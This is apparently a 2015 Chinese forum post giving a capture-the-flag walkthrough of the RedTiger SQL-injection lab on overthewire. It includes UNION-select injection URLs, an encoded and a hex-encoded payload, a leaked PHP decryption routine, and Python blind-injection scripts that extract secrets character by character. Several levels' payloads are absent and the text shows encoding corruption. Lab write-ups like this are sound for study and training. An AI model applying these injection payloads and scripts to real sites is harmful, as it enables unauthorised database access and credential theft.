資源共享吧|易語言論壇|逆向破解教程|輔助開發(fā)教程|網(wǎng)絡(luò)安全教程|m.rigasin.com|我的開發(fā)技術(shù)隨記
標題: write ctf 注入 [打印本頁]
作者: miewang 時間: 2015-8-16 21:18
標題: write ctf 注入
Level 1
普普通通的一個注入關(guān)��,直接構(gòu)造語句即可
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
Level 2題目說��,一個簡單的密碼繞過���,那就簡單一下試試,sql萬能密碼
繞過成功
Level 3嘗試出個錯誤...也是醉了
那我們就出個錯瞧瞧~
嘗試是否為sqli���,但是sql無錯誤回顯��,考慮php原因
直到
才顯示出來一個錯誤
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
因為.inc這種文件可以訪問��,所以我們獲得了一部分源碼
<?php
function encrypt($str)
{
$cryptedstr ="";
for($i =0; $i < strlen($str); $i++)
{
$temp = ord(substr($str,$i,1))^192;
while(strlen($temp)<3)
{
$temp ="0".$temp;
}
$cryptedstr .= $temp."";
}
return base64_encode($cryptedstr);
}
function decrypt ($str)
{
if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
{
$str = base64_decode($str);
if($str !=""&& $str !=null&& $str !=false)
{
$decStr ="";
for($i=0; $i < strlen($str); $i+=3)
{
$array[$i/3]= substr($str,$i,3);
}
foreach($array as $s)
{
$a = $s^192;
$decStr .= chr($a);
}
return $decStr;
}
returnfalse;
}
returnfalse;
}
?>
在這個文件中��,給出了對usr這個參數(shù)的加密和解密方式���,所以,我們用這個加密方式加密我們的語句��,得到最終的POC
https://redtiger.labs.overthewire.org/level3.php
?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjI0
Level 4點了一下Click me,下面顯示了
Query returned 1 rows.
加個單引號變?yōu)榱?/font>
Query returned 0 rows.
所以應(yīng)該是盲注了
order by表示有兩個column��,雖然也沒啥用..先來判斷長度
https://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword ,1 from level4_secret where length(keyword)=17
一共17個字節(jié)���,這次肯定不是MD5���。。��。
寫腳本���,從A-Z a-z 0-9跑一遍,得出最終結(jié)果
# -*- coding: utf-8 -*-
import requests
s = requests.Session()
result =""
login ={'password':'dont_publish_solutions_GRR!',
'level4login':'Login'}
for x in range(1,17):
flag =True
url ="http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1 from level4_secret where SUBSTR(keyword,%d,1)='%s'"
for i in range(ord('a'),ord('z')+1):
if(flag ==False):
break
test_url = url %(x,chr(i))
r = s.post(test_url, data = login)
if"2 rows"in r.content:
result = result + chr(i)
flag =False
for i in range(ord('A'),ord('Z')+1):
if(flag ==False):
break
test_url = url %(x,chr(i))
r = s.post(test_url, data = login)
if"2 rows"in r.content:
result = result + chr(i)
flag =False
for i in range(ord('0'),ord('9')+1):
if(flag ==False):
break
test_url = url %(x,chr(i))
r = s.post(test_url, data = login)
if"2 rows"in r.content:
result = result + chr(i)
flag =False
print result
print result
Level 5還是登錄繞過��,禁用了幾個函數(shù)���,而且不是盲注���,讓我們關(guān)注看報錯信息
通過最終的結(jié)果的行數(shù),判斷是否登錄成功所以我們的POC
Level 6Target: Get the first user in table level6_users with status 1
先查status 1 就是普普通通的注入���,沒啥難度
POC
https://redtiger.labs.overthewire.org/level6.php?user=0%20union%20select%201,0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f75736572732077686572652069643d33202d2d20,1,1,1%20from%20level6_users%20where%20status=1
Level 7又是盲注���,但是這次出在了搜索的位置��,限制更加嚴格��,所以我們換個關(guān)鍵字..
所以我們還是和上面某Level一樣的思路
再次編程
# -*- coding: utf-8 -*-
import requests
s = requests.Session()
result =""
login ={'password':'dont_shout_at_your_disks***',
'level7login':'Login',
'dosearch':'search!'}
for x in range(1,17):
flag =True
url ="http://redtiger.labs.overthewire.org/level7.php"
for i in range(32,127):
if(flag ==False):
break
login["search"]="google%%' and locate('%s',news.autor COLLATE latin1_general_cs)=%d and '%%'='"%(chr(i), x)
r = s.post(url, data = login)
if"FRANCISCO"in r.content:
result = result + chr(i)
flag =False
print result
print result
上面這段代碼貌似有點小問題
Level 8加了一個' 爆出了錯誤���,明顯是error base
Level 9依舊是error base
通過一個' 判斷注入出現(xiàn)在textarea中,于是構(gòu)建語句
過關(guān)
Level 10只給了一個Login按鈕���,通過抓包��,我們看到了一個base64加密過得json
解密得到
| 歡迎光臨 資源共享吧|易語言論壇|逆向破解教程|輔助開發(fā)教程|網(wǎng)絡(luò)安全教程|m.rigasin.com|我的開發(fā)技術(shù)隨記 (http://m.rigasin.com/) |
Powered by Discuz! X3.4 |